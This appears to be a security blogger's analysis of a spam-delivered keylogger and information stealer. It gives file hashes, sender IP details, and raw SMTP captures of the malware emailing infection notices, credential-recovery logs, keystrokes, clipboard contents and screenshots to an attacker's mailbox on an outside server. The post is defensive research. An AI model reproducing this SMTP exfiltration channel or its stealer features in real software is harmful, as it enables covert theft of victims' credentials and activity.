Another day another bit of e-mail junk.
This one came to me from an AOL email account (using an authenticated AOL user thereaty5@aol.com) submitted by IP 41.138.164.240. The mail was sent to an address scraped from the internet.
inetnum: 41.138.164.0 - 41.138.165.255 netname: VISAFONE-PH-PDSN1 descr: Visafone Communications Limited, descr: 12, Ologun Agbaje Street, descr: Victoria Island, descr: Lagos country: NG
Interestingly enough Visafone normally is associated with financial 419 scams and it is the first time I’ve seem malware emanate from Nigeria.
The file attached was:
SHA256: 7d82144bde1d75f327f847c60b870a7c7dc7dc0367c20500e8cff645f3c30667
Virustotal Report
Malwr Report
Both sites had never seen the file before.
It then extracts another file and launches it.
SHA256: 4efdba83132aaab21cadfcf624d6f7ce5fa89e6497d8f302388303cdb9b3a023
Virustotal Report
Malwr Report
This component had been seen before but is not detected by any AV.
Once run it uses an unusual method to ex-filtrate data. sends a series of emails using SMTP server mx1.3owl.com on port 587. The first message informs the malware owner the system has been infected.
220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System] EHLO w7vm1 250-mx1.main-hosting.com 250-PIPELINING 250-SIZE 5728640 250-ETRN 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU= 334 UGFzc3dvcmQ6 == 235 2.7.0 Authentication successful MAIL FROM:<cross@livedata.hints.me> 250 2.1.0 Ok RCPT TO:<cross@livedata.hints.me> 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> MIME-Version: 1.0 From: cross@livedata.hints.me To: cross@livedata.hints.me Date: 26 Oct 2014 19:22:53 +0000 Subject: Logger - Server Ran - [W7VM1] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable This is an email notifying you that W7VM1 has ran your logger and emails= should be sent to you shortly and at interval choosen.=0D=0A =0D=0ALogger= Details: =0D=0AServer Name: scandetail.exe=0D=0AKeylogger Enabled: True= =0D=0AClipboard-Logger Enabled: True=0D=0ATime Logs will be delivered: Every= 10 minutes=0D=0A =0D=0AStealers Enabled: True=0D=0ATime Log will be delivered:= Average 2 to 4 minutes=0D=0A =0D=0ALocal Date and Time: 26/10/2014 19:22:51= =0D=0AInstalled Language: en-US=0D=0AOperating System: Microsoft Windows= 7 Professional =0D=0AInternal IP Address: REDACTED=0D=0AExternal IP= Address: REDACTED=0D=0AInstalled Anti-Virus: =0D=0AInstalled Firewall:= . 250 2.0.0 Ok: queued as A05F9144111D 421 4.4.2 mx1.main-hosting.com Error: timeout exceeded
Then steals information from the system.
220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System] EHLO w7vm1 250-mx1.main-hosting.com 250-PIPELINING 250-SIZE 5728640 250-ETRN 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU= 334 UGFzc3dvcmQ6 == 235 2.7.0 Authentication successful MAIL FROM:<cross@livedata.hints.me> 250 2.1.0 Ok RCPT TO:<cross@livedata.hints.me> 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> MIME-Version: 1.0 From: cross@livedata.hints.me To: cross@livedata.hints.me Date: 26 Oct 2014 18:53:29 +0000 Subject: Logger|Recovery Log - [W7VM1] Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable **********************************************= =0D=0A Operating System Intel Recovery= =0D=0A **********************************************= =0D=0ACPU Name: W7VM1=0D=0ALocal Date and Time: 26/10/2014 18:53:22=0D=0AInstalled= Language: en-US=0D=0ANet Version: 2.0.50727.5420=0D=0AOperating System= Platform: Win32NT=0D=0AOperating System Version: 6.1.7601.65536=0D=0AOperating= System: Microsoft Windows 7 Professional =0D=0AInternal IP Address: REDACTED= =0D=0AExternal IP Address: REDACTED=0D=0AInstalled Anti-Virus: =0D=0AInstalled= Firewall: =0D=0A **********************************************= =0D=0A WEB Browser Password Recovery= =0D=0A **********************************************= =0D=0A=0D=0A **********************************************= =0D=0A Mail Messenger Password Recovery= =0D=0A **********************************************= =0D=0A=0D=0A **********************************************= =0D=0A Internet Download Manager Recovery= =0D=0A **********************************************= =0D=0A **********************************************= =0D=0A Jdownloader Password Recovery= =0D=0A **********************************************= =0D=0A **********************************************= =0D=0A Steam Username Recovery= =0D=0A **********************************************= =0D=0A . 250 2.0.0 Ok: queued as 92F9D14401FA
Then screenshots
220 mx1.main-hosting.com ESMTP [Main-hosting.com Mail System] EHLO w7vm1 250-mx1.main-hosting.com 250-PIPELINING 250-SIZE 5728640 250-ETRN 250-AUTH PLAIN LOGIN 250-AUTH=PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN AUTH login Y3Jvc3NAbGl2ZWRhdGEuaGludHMubWU= 334 UGFzc3dvcmQ6 == 235 2.7.0 Authentication successful MAIL FROM:<cross@livedata.hints.me> 250 2.1.0 Ok RCPT TO:<cross@livedata.hints.me> 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> MIME-Version: 1.0 From: cross@livedata.hints.me To: cross@livedata.hints.me Date: 26 Oct 2014 19:32:53 +0000 Subject: Logger - Key Recorder - [W7VM1] Content-Type: multipart/mixed; boundary=--boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be ----boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable **********************************************= =0D=0A ClipBoard Log=0D=0A= **********************************************= =0D=0A[------------19:22:51------------]=0D=0Ahttps://www.virustotal.com/en-gb/file/4efdba83132aaab21cadfcf624d6f7ce5fa89e6497d8f302388303cdb9b3a023/analysis/1414351286/= =0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]= =0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]= =0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]= =0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]= =0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]= =0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]= =0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]= =0D=0A=0D=0A=0D=0A[------------19:23:15------------]=0D=0A=0D=0A=0D=0A[------------19:23:15------------]= =0D=0A=0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me= =0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me= =0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me= =0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me= =0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me= =0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me= =0D=0A=0D=0A[------------19:28:55------------]=0D=0Across@livedata.hints.me= =0D=0A=0D=0A[------------19:28:55------------]=0D=0A=0D=0A=0D=0A[------------19:30:28------------]= =0D=0A=0D=0ALOL=0D=0A=0D=0A=0D=0A **********************************************= =0D=0A Keylogger Log=0D=0A= **********************************************= =0D=0A=0D=0A=0D=0A[Untitled - Notepad - 26/10/2014 19:24:51]=0D=0A[BS] [del]= are [ctrl] 35[/ctrl]=0D=0A=0D=0ALOL=0D=0ALOL=0D=0ALOL[^] [ctrl]= cvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv[/ctrl] ----boundary_0_acca6283-88a8-4958-b80e-0ab8b84bb2be Content-Type: application/octet-stream; name=screenshot1.jpeg Content-Transfer-Encoding: base64 iVBORw0KGgoAAAANSUhEUgAABJ4AAAOJCAYAAABcZ+hHAAAAAXNSR0IArs4c6QAAAARnQU1B TRUNCATED
So poorly done. The mail is submitted using AUTH with the details of the mail account!
User: cross@livedata.hints.me
Password: REDACTED
oops!
Additionally another address seems related to this: ab.frankmoore@live.com (friendly name of “Wofa Group Plc”, which appears on one website as a company in… Nigeria) which was also used in September 2013 to send similar “please open the attached” malware type email. In some test messages the IP 41.138.164.31 (similar to the one above) registered at Nigeria’s VISAFONE was used to submit via webmail.
At the time of researching and writing this document it seems nobody has fallen for this other than researchers. (tag: ubapaul)